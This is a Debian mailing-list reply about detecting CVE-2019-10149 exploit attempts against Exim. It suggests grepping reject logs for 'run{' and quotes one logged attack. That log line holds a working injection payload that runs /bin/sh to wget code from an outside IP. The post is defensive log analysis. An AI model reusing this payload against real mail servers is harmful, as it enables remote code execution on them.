Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.

To: debian-user@lists.debian.org
Subject: Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
From: Reco <recoverym4n@enotuniq.net>
Date: Thu, 20 Jun 2019 22:52:32 +0300
Message-id: <[🔎] E1he36m-0002hv-Jr@enotuniq.net>
In-reply-to: <[🔎] 6e7e3f18-d8f7-5bc3-fb6f-e1aac359fba0@affinityvision.com.au>
References: <[🔎] b764cc26-2353-2587-437f-8a2282adeda6@affinityvision.com.au> <[🔎] E1hdxNd-0002Kt-UY@enotuniq.net> <[🔎] 55b8eadd-06c4-5220-8ebc-5836c38d56b0@affinityvision.com.au> <[🔎] E1he282-0002e3-50@enotuniq.net> <[🔎] 6e7e3f18-d8f7-5bc3-fb6f-e1aac359fba0@affinityvision.com.au>

	Hi.

On Fri, Jun 21, 2019 at 05:45:27AM +1000, Andrew McGlashan wrote:
> On 21/6/19 4:49 am, Reco wrote:
> >> Thank you, I've changed the banner for now.... let's hope that
> >> lessens the problem.
> > 
> > Please share the results if possible.
> > 
> > On this particular MTA I've counted whopping 4 attempts to exploit 
> > CVE-2019-10149 so far. One made from France, three from US. I'm
> > kind of disappointed, I've expected half a million Chineese and 
> > Russian bots at least ;)
> 
> I've got good logs, what is the easiest string to grep for in the logs
> to see attempts? Or have you got a more fancy solution?

Plain old grep is more than enough here.
This one:

grep 'run{' /var/log/exim4/reject*

finds things like these:

2019-06-19 18:54:43 H=(service.com) [107.182.225.42] F=<support@service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.xxx.xxx.xxx\x22}}@localhost>: Unrouteable address

Reco

Reply to:

Follow-Ups:
- Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
  - From: Andrew McGlashan <andrew.mcglashan@affinityvision.com.au>

References:
- Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
  - From: Andrew McGlashan <andrew.mcglashan@affinityvision.com.au>
- Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
  - From: Reco <recoverym4n@enotuniq.net>
- Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
  - From: Andrew McGlashan <andrew.mcglashan@affinityvision.com.au>
- Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
  - From: Reco <recoverym4n@enotuniq.net>
- Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
  - From: Andrew McGlashan <andrew.mcglashan@affinityvision.com.au>

Prev by Date: Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
Next by Date: Re: Please consider unblocking Chromium and linux packages for Buster
Previous by thread: Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
Next by thread: Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
Index(es):
- Date
- Thread